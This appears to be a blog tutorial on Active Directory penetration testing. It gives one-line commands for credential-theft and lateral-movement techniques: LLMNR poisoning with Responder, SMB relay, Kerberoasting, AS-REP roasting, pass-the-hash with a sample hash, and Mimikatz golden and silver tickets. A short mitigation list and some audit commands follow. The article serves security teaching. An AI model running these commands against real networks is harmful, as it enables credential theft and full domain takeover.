2025-02-07
After overcoming network challenges and successfully connecting vulnerable Windows machines to a domain controller, the next critical step in penetration testing is understanding and exploiting initial attack vectors in Active Directory (AD). This article provides practical commands and techniques to identify and exploit these vectors, ensuring a robust understanding of AD security.
1. Enumeration with PowerView
PowerView is a PowerShell tool used for AD enumeration. It helps identify users, groups, and permissions.
Import-Module .\PowerView.ps1 Get-NetUser | Select-Object samaccountname, description Get-NetGroup -GroupName "Domain Admins"
2. LLMNR/NBT-NS Poisoning
Attackers can exploit LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) to intercept credentials.
sudo responder -I eth0 -wrf
3. SMB Relay Attacks
SMB Relay attacks allow attackers to relay SMB authentication attempts to other machines.
sudo ntlmrelayx.py -tf targets.txt -smb2support
4. Kerberoasting
Kerberoasting involves extracting service account credentials from Kerberos tickets.
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "service/MSSQLSvc"
5. AS-REP Roasting
AS-REP Roasting targets users with Kerberos pre-authentication disabled.
GetNPUsers.py -dc-ip 192.168.1.1 domain/ -usersfile users.txt -format hashcat -outputfile hashes.txt
6. Pass-the-Hash
This technique allows attackers to authenticate without knowing the plaintext password.
pth-winexe -U admin%aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 //192.168.1.10 cmd
7. Golden Ticket Attack
A Golden Ticket grants unrestricted access to the domain.
mimikatz # kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:hash /ptt
8. Silver Ticket Attack
A Silver Ticket provides access to specific services.
mimikatz # kerberos::golden /user:ServiceAccount /domain:domain.com /sid:S-1-5-21-123456789-1234567890-123456789 /target:service.domain.com /service:HTTP /rc4:hash /ptt
9. BloodHound for AD Mapping
BloodHound visualizes AD attack paths.
sudo neo4j start bloodhound --no-sandbox
10. Mitigation Techniques
- Disable LLMNR and NBT-NS.
- Enforce SMB signing.
- Enable Kerberos pre-authentication.
- Regularly audit AD permissions.
What Undercode Say
Active Directory is a cornerstone of enterprise environments, making it a prime target for attackers. Understanding initial attack vectors is crucial for both offensive and defensive cybersecurity professionals. Below are additional Linux-based commands and tools to enhance your AD security knowledge:
- Impacket Suite: A collection of Python scripts for AD exploitation.
python3 GetADUsers.py -dc-ip 192.168.1.1 domain/user -all
CrackMapExec: A Swiss Army knife for AD environments.
crackmapexec smb 192.168.1.0/24 -u user -p password --shares
3. LDAP Search: Query AD for sensitive information.
ldapsearch -x -h 192.168.1.1 -b "dc=domain,dc=com" "(objectClass=user)"
4. Nmap for AD Enumeration:
nmap --script smb-enum-users.nse -p 445 192.168.1.1
5. Wireshark for Traffic Analysis:
Capture and analyze Kerberos traffic to detect anomalies.
6. GPO Auditing:
Use `gpresult` to review Group Policy Objects applied to machines.
gpresult /r
7. Privilege Escalation:
Use `winpeas` to identify misconfigurations.
winpeas.exe
8. Password Policy Auditing:
Check password policies using `net accounts`.
net accounts
9. SMB Vulnerability Scanning:
Use `smbclient` to identify vulnerable SMB versions.
smbclient -L 192.168.1.1
10. Kerberos Configuration:
Review Kerberos ticket settings with `klist`.
klist
For further reading, explore these resources:
By mastering these techniques and tools, you can better secure your AD environment and mitigate potential threats. Remember, cybersecurity is a continuous learning process—stay curious and keep improving!
References:
Hackers Feeds, Undercode AI
